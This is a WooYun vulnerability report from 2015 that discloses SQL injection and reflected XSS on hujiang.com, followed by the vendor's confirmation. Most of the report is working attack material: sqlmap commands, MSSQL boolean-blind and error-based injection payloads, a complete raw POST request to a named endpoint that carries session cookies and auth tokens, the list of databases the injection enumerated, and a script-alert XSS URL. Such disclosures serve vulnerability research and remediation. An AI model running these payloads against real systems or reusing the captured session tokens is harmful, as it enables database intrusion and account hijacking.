
Vulnerability summary

Defect ID: wooyun-2015-0165323

Title: SQL injection vulnerability at a hujiang.com endpoint + reflected XSS

Vendor: hujiang.com

Author: creep

Submitted: 2015-12-29 21:14

Fixed: 2016-02-12 18:49

Disclosed: 2016-02-12 18:49

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure timeline:

2015-12-29: Details sent to the vendor, awaiting vendor response
2015-12-30: Vendor confirmed; details visible to the vendor only
2016-01-09: Details opened to core white hats and domain experts
2016-01-19: Details opened to regular white hats
2016-01-29: Details opened to intern white hats
2016-02-12: Details opened to the public

Summary:

I hear there are gifts -w-

Details:



The Title parameter is the injection point; the injection request is saved as 1.txt (its contents are shown further below).
sqlmap.py -r 1.txt

sqlmap identified the following injection point(s) with a total of 35 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Type=1
Title=1%' AND 3814=3814 AND '%'='
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Type=1
Title=1%' AND 8834=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (8834=8834) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(112)+CHAR(113))) AND '%'='
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2012


1.txt

POST /ajax/ASP.PageClass,App_Web_music_box.aspx.5df98d44.rasgroeb.ashx?p=rh9WhGz6z8TvuTfEaIBgigE0VSKHuMJQLgFc5JoJ-Pk1&_method=PageSearchMusic&_session=no HTTP/1.1
Host: bulo.hujiang.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://bulo.hujiang.com/app/music/%E4%B9%9D%E6%9C%88%E6%88%90%E6%AE%87/
Content-Length: 15
Content-Type: text/plain; charset=UTF-8
Cookie: _hotlink_uid=145106436134329; HJ_UID=df16267f-4618-bdb7-5117-120f8f46f8e4; TRACKSITEMAP=3%2C6%2C10%2C20%2C45%2C57%2C63%2C65%2C73%2C13%2C; _REF=; _SREF_10=http%3A%2F%2Fdict.hjenglish.com%2F; hj_token=s_daa18e800e251e3438da5c32193df0c7|MTE5NThkOA==; hjd_ajax_Language2011=en; __utma=249109652.1433456460.1451064409.1451064409.1451204932.2; __utmz=249109652.1451064409.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _SREF_6=http%3A%2F%2Fbulo.hujiang.com%2Fmenu%2F; ClubAuth=B83651E902FAAE8B8BCB9F8190710155E8D75A6ED1FAFD340097CC3AA015E2353EF999F57AF8D6168B7A9350F2A301418EED19ADF39ADDB54D5455A8DC31A0D3CBDBE9CE4966EE80E73348897F59ECC4E969B9A7905DF270CC7FFB4A2081E5088C23301C11FA65B98568E0F9B06D45093917A5918FA777920C5399A5360F6BCD107CCD0A337C685C243A7615DCEB3666FB476A92795E58C34FE99F68A1C12348022A4B62; _SREF_45=http%3A%2F%2Fms.hujiang.com%2Fdiary%2F; adsNewsTrueId=1663; news=true; _SREF_3=http%3A%2F%2Fms.hujiang.com%2Fdiary%2F; HJ_SID=9ef28c01-e16c-df99-25fb-3b5b95108673; HJ_CST=0; HJ_SSID_3=9d7120eb-9c1d-8a5f-eb4a-7735bb40782b; HJ_CSST_3=0; BuloMusicControl=0; _hotlink_source_track=http%3A//dict.hjenglish.com/; HJ_SSID_10=842075f2-5881-ae37-4a08-34e032bb0ba2; HJ_CSST_10=0; ingFrameHeight=1664; cck_lasttime=1451238877019; cck_count=0; bulo_tips_201208_nc=%7B%22tc%22%3A0%2C%22cc%22%3A0%2C%22fc%22%3A0%2C%22ac%22%3A0%2C%22pc%22%3A0%2C%22sc%22%3A0%2C%22mc%22%3A0%2C%22nc%22%3A0%2C%22st_atme%22%3A0%2C%22st_answer%22%3A0%2C%22st_sys%22%3A0%7D
DNT: 1
Connection: keep-alive
Type=1
Title=1*


sqlmap.py -r 1.txt --dbs

web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2012
available databases [16]:
[*] DBCenter
[*] hj_cms
[*] HJ_Cms_App
[*] HJ_CmsExam
[*] hj_cmsLog
[*] HJ_CmsLogHistory
[*] HJ_CMSZhong
[*] HJ_Dict_New
[*] HJ_External
[*] HJ_K12SEOTiKu
[*] HJ_Lexicon
[*] HJ_Movie
[*] master
[*] model
[*] msdb
[*] tempdb


In addition, a reflected XSS:
http://t.hujiang.com/star/all/?key=%3Cscript%3Ealert%281%29%3C%2Fscript%3E

Proof of vulnerability:

As above

Suggested fix:

You're more professional than me -w-

Copyright notice: when reposting, credit the source: creep@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Rank: 10

Confirmed: 2015-12-30 13:16

Vendor reply:

Issue confirmed and being handled, thank you. The databases listed above do not include any important business system databases, so it is rated Medium.

Latest status:

None yet